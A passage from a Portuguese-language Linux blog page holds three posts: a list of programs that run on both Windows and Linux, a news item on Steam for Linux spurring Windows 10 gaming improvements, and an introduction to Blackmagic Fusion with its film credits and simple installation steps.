Um dos navegadores mais populares do mundo e utilizado por milhões de pessoas está presente em ambas as plataformas, a experiência de usar o Mozilla Firefox no Windows e no Linux é basicamente a mesma, então em uma possível migração isso não fará muita diferença. Claro que o Firefox não é o único browser multiplataforma, temos outras opções que convergem, como o Chrome, Vivaldi, Opera entre outros.

2 - GIMP

GIMP para Linux e WIndows

Eu uso o GIMP todos os dias, na verdade, todas as imagens que você está vendo neste artigo foram feitos nele. O GIMP também pode ser utilizado no Windows sem maiores problemas, inclusive, a nossa modificação, o PhotoGIMP, pode ser usado no sistema da Microsoft também. Ele é um ótimo programa para manipulação de imagens.


Inkscape para Windows e Linux

Outro programa que eu costumo usar com frequência, não tanto quanto o GIMP, mas ainda assim, com frequência, é o Inkscape. Um programa para imagens vetoriais. Você pode ver alguns trabalhos feitos com ele no próprio logo do blog e do canal, na DioStore também e em alguns outros projetos aqui do site. O Inkscape está disponível para usar no Windows também sem maiores problemas.


Kdenlive Windows e Linux

Este é um dos meus softwares favoritos de todos, recentemente o Kdenlive ganhou um porte para Windows, que na verdade ainda está em progressão, você pode ver ele rodando no Windows neste vídeo do nosso canal. Para quem não conhece, o Kdenlive é um editor de vídeos não linear que está muito próximo de ser o melhor aplicativo para edição de vídeo completamente grátis, sem versões pagas com mais recursos. Vale muito a pena conhecer.


VirtualBox para Windows e Linux

Máquinas virtuais são extremamente úteis, ao menos para mim, com elas eu consigo experienciar praticamente qualquer sistema operacional, que é algo que eu faço muito, basta olhar a playlist de reviews de sistemas operacionais que temos no canal. O VirtualBox pode ser utilizado em qualquer sistema também, sem distinção.


LibreOffice para Windows e Linux

O LibreOffice é uma ótima suíte office que deve atender a maior parte dos usuários de computador. O maior problema que usuários do Libre tem é abrir documentos do Microsoft Office sem desconfigurar o documento, isso acontece não por culpa do Libre, mas pelo próprio formato proprietário do Office que tem essa intenção mesmo, funcionar somente nele. 

Deixando isto de lado, as funções do LibreOffice atendem diversos governos ao redor do mundo e diversas empresas e é um dos softwares de código aberto que tem mais relevância do mercado. O mesmo LibreOffice que você pode usar no Linux você pode usar no Windows.


OBS Studio

Este é um programa que ficou muito popular entre os YouTubers, o OBS Studio tem versão para Linux e Windows e permite que você faça captura de tela no seu computador ou faça live streams para o YouTube, entre muitas outras funções.

Hoje ele é um programa muito importante para a produção do canal Diolinux.

8 - VLC

VLC Windows e Linux

O VLC é um dos melhores players multimídia que existem, reza a lenda que ele "toca até tampa de Danone". Isso acontece porque o VLC tem vários codecs inclusos no próprio programa, o que dispensa a instalação de pacotes adicionais para reproduzir praticamente qualquer tipo mídia.


Audacity Windows e Linux

Outro programa muito importante para quem produz conteúdo, especialmente em áudio. O Audacity é um editor de áudio grátis e aberto muito útil, especialmente para fazer redução de ruído em arquivos gravados em ambientes externos.


Thunderbird Windows e Linux

Outro programa que eu uso com frequência é o Thunderbird, um programa para fazer gerenciamento de contas de e-mail. Ele é simples e funcional, também tem versão para todas as plataformas. Já atendi algumas empresas fazendo implantação do Thunderbird no lugar no Microsoft Outlook.

Existem muitos outros


Existem outros programas que podem ser usados em ambas as plataformas, inclusive, a maioria desta lista também pode ser utilizada no macOS da Apple, não somente no Windows e no Linux. Fique à vontade para colocar nos comentários mais programas que você gosta e que possuem versões para todas as plataformas.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Ex-funcionário da Valve afirma que Steam para Linux forçou a Microsoft a melhorar o Windows

Neste semana eu li uma notícia que saiu no ZDNet que falava sobre a presença da Steam Linux e como isso influenciou a Microsoft a melhorar o Windows 10 para games, mostrando o quanto a concorrência só faz com que todo o público consumidor ganhe.

Steam no Windows 10




Quando a Valve resolveu apoiar o Linux como plataforma de jogos, criando até o seu SteamOS, um sistema operacional baseado no Debian com foco nos jogos, o principal motivo apontado era a insatisfação com as atuais versões no Windows. Isso se agravou quando a Valve descobriu que alguns de seus games, mesmo sem otimizações, rodavam com OpenGL melhor no Linux do que no Windows.

Com isso a Valve começou a chamar seus parceiros, como a Alienware, para trazer as Steam Machines para o mercado, ainda que tenha sido investido muito em marketing até o momento. Essa manobra chamou a atenção da Microsoft, segundo o ex-funcionário da Valve, a "gigante de Redmond" focou muito de seus esforços no Windows 10 para melhorar o sistema para os gamers, e se comparado com o Windows 8.1, parece ter realmente conseguido.

Essa é uma prova de que incentivar o crescimento no Linux como plataforma de games para computador ajuda a todos, até mesmo quem não utiliza "o sistema do pinguim" no dia a dia.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




quarta-feira, 11 de janeiro de 2017

Fusion - Um compositor de vídeo profissional para Linux

Quem está procurando um alternativa para o Adobe After Effects no Linux acaba de ganhar uma nova opção, além do todo poderoso Nuke, e do open source Natron, além do popular Blender, temos também é o Fusion da Black Magic.

Fusion - Linux Video Composite



O Fusion é uma das ferramentas mais populares em Hollywood, ele ajudou a fazer diversas obras, filmes e séries que tem renome em vários aspectos, incluindo obviamente, efeitos especiais, que é onde o programa se destaca. 

O Fusion possui uma versão grátis para Linux, Windows e Mac e uma versão paga que traz mais funções também. Acho interessante comentar alguns dos filmes e séries em que o Fusion foi utilizado, assim você pode ter uma ideia da qualidade dele, então segue uma pequena listinha: 

- 2012 (filme)
- 300
- Avatar
- Captain America: The Winter Soldier
- Fantastic Four: Rise of the Silver Surfer
- Game of Thrones
- Ghost Rider
- Gravity (filme)
- Hancock (filme)
- Happy Feet
- Harry Potter and the Goblet of Fire
- Harry Potter and the Order of the Phoenix
- Hellboy 2
- Independence Day (1996)
- Iron Man (2008)
- Journey to the Center of the Earth
- King Kong (2005)
- Lost
- Mr. & Mrs. Smith
- Noah (2014)
- Pirates of the Caribbean: Dead Man's Chest
- Prince of Persia: The Sands of Time (filme)
- Prometheus (2012 filme)
- Resident Evil: Apocalypse
- Saw 3D
- Spider-Man 3
- Superman Returns
- Terminator Salvation
- The Chronicles of Narnia: The Voyage of the Dawn Treader
- The Day After Tomorrow
- The Matrix Reloaded
- The Matrix Revolutions
- The Social Network
- Thor (filme)
- Titanic (1997)

Estes são alguns, entre muitos outros, que fazem parte do grandioso Hall de projetos onde o Fusion teve participação, o programa tem mais de 20 anos de existência e de mercado e é uma plataforma profissional consolidada no ramo de efeitos especiais. A maior parte dos filmes não é finalizada com apenas um programa, então é bom deixar claro que sumariamente, os filmes não usaram "apenas" o Fusion, mas, ele também.

Black Magic Fusion


Download e instalação


Como eu comentei, o Fusion tem uma versão grátis e uma paga, nós vamos aprender a instalar a versão grátis, se você precisar da versão paga o valor da licença é de 995 dólares. Vamos para a instalação?

1 - Acesse o site da Black Magic. Clique no botão de download.

2 - Escolha a plataforma.

Black Magic Fusion

3 - Informe os seus dados para poder fazer o download.

Black Magic Fusion

Depois de completar os dados, clique do botão "Register & Download"

4 - Você vai baixar um arquivo compactado, basta extrair e dentro dele você vai encontrar um arquivo .run, basta dar dois cliques nele e o processo de instalação vai começar com um instalador no estilo Next>>Next>>Finish.

Black Magic Fusion

Black Magic Fusion

Black Magic Fusion

Black Magic Fusion

Black Magic Fusion

Black Magic Fusion

Depois de concluir o processo de instalação, você vai encontrar o programa no menu do seu computador, assim como um atalho para desinstalar o programa também.

Agora é só fazer as suas criações cinematográficas, ganhar muito dinheiro e vir aqui dizer "obrigado" pela gente ter te mostrado esse programa fantástico! 😀😁

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




segunda-feira, 9 de janeiro de 2017